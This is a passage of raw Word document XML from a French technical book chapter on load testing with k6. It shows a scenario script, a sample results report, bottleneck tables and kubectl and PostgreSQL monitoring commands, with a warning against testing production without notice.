                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Description de la façon dont les utilisateurs arrivent et ce qu'ils font : proportion de lectures et d'écritures, pauses, parcours, pics. Il détermine la validité du test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2857500"/>
            <wp:docPr id="101" name="Picture 101"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f99.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.99 — Trois profils de charge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux profils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Profil de charge : 200 utilisateurs virtuels pendant 10 minutes</w:t>
        <w:br/>
        <w:t># avec une montée progressive sur 2 minutes</w:t>
        <w:br/>
        <w:t>k6 run --vus 200 --duration 10m scenario.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># Recherche du point de rupture : paliers croissants</w:t>
        <w:br/>
        <w:t>k6 run --stage 2m:50 --stage 5m:200 --stage 5m:500 --stage 2m:0 rupture.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>86.2 Écrire un scénario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un scénario réalise un parcours, pas une requête isolée. Il vérifie le code de réponse, respecte des pauses et mesure des étapes nommées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un scénario vérifié · js</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import http from "k6/http";</w:t>
        <w:br/>
        <w:t>import { check, sleep, group } from "k6";</w:t>
        <w:br/>
        <w:t>import { Trend } from "k6/metrics";</w:t>
        <w:br/>
        <w:br/>
        <w:t>const recherche = new Trend("duree_recherche");</w:t>
        <w:br/>
        <w:br/>
        <w:t>export const options = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  scenarios: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    navigation: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      executor: "ramping-vus",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      startVUs: 10,</w:t>
        <w:br/>
        <w:t xml:space="preserve">      stages: [</w:t>
        <w:br/>
        <w:t xml:space="preserve">        { duration: "2m", target: 100 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">        { duration: "5m", target: 100 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">        { duration: "1m", target: 0 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ],</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  thresholds: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_req_failed: ["rate&lt;0.01"],          // moins de 1 % d'erreurs</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_req_duration: ["p(95)&lt;800"],        // 95 % sous 800 ms</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "duree_recherche": ["p(95)&lt;300"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:t>export default function () {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group("accueil", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const r = http.get("https://recette.exemple.fr/");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    check(r, { "accueil 200": (res) =&gt; res.status === 200 });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  group("recherche", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const debut = Date.now();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const r = http.get("https://recette.exemple.fr/api/recherche?q=livre");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    recherche.add(Date.now() - debut);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    check(r, { "recherche 200": (res) =&gt; res.status === 200 });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  sleep(Math.random() * 3 + 1);   // pause réaliste entre les actions</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.335 — Cinq éléments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55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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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322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Erreur fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Profil de montée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pic instantané irréaliste</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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thresholds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Critère d'échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Aucun seuil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérification de réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ignorer les 500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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sleep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Pause utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Test qui sature artificiellement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étapes nommées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tout dans une seule requête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NE TESTEZ PAS LA PRODUCTION SANS PRÉVENIR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un test de charge sur un environnement partagé peut dégrader le service réel, déclencher des alertes et fausser la facturation. Utilisez un environnement dédié, avec les mêmes dimensions que la production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>86.3 Lire les résultats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La latence moyenne est trompeuse. Ce sont les percentiles et la saturation qui expliquent le comportement du système à l'approche de la rupture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un rapport typique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xml:space="preserve">     checks.........................: 100.00% ✓ 48213  ✗ 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">     http_req_duration..............: avg=210ms  min=18ms  p(90)=420ms</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                      p(95)=610ms  p(99)=1.42s  max=6.1s</w:t>
        <w:br/>
        <w:t xml:space="preserve">     http_req_failed................: 0.07%   ✓ 34   ✗ 48179</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">   █ accueil</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">     http_req_duration..............: avg=95ms   p(95)=180ms</w:t>
        <w:br/>
        <w:t xml:space="preserve">   █ recherche</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">     duree_recherche................: avg=310ms  p(95)=680ms   ✗ seuil 300ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.336 — Quatre observations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26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Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Interprétation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>p95 stable, p99 explose</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Quelques requêtes lentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chercher la queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Débit plafonne</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Ressource saturée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Profilage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreurs à partir d'un seuil</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File d'attente pleine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limiter et protéger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>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Latence croît linéairement</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Marge disponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Dimensionner</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POINT DE RUPTURE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Charge à partir de laquelle la latence augmente sans limite alors que le débit n'augmente plus. Le système sature et les files s'allongent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>86.4 Trouver le goulot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test de charge isolé ne dit pas quelle ressource sature. Il faut corréler les résultats avec la CPU, la mémoire, les connexions et les requêtes lentes côté base.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois observations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Pendant le test, observer la saturation</w:t>
        <w:br/>
        <w:t>kubectl top pods -n production</w:t>
        <w:br/>
        <w:t>kubectl get hpa -n production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Requêtes lentes côté PostgreSQL</w:t>
        <w:br/>
        <w:t>psql -c "SELECT pid, now() - query_start AS duree, state, left(query, 80)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         FROM pg_stat_activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">         WHERE state &lt;&gt; 'idle' ORDER BY duree DESC LIMIT 10;"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Connexions actives et limites</w:t>
        <w:br/>
        <w:t>psql -c "SELECT count(*) FROM pg_stat_activity;"</w:t>
        <w:br/>
        <w:t>psql -c "SHOW max_connections;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.337 — Cinq goulots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87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Goulot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CPU du service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence qui suit la charge</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Optimiser ou ajouter des réplicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Pool de connexions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Attentes avant la base</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Réduire ou regrouper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requête lente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>p99 élevé, CPU base saturé</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Index et plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
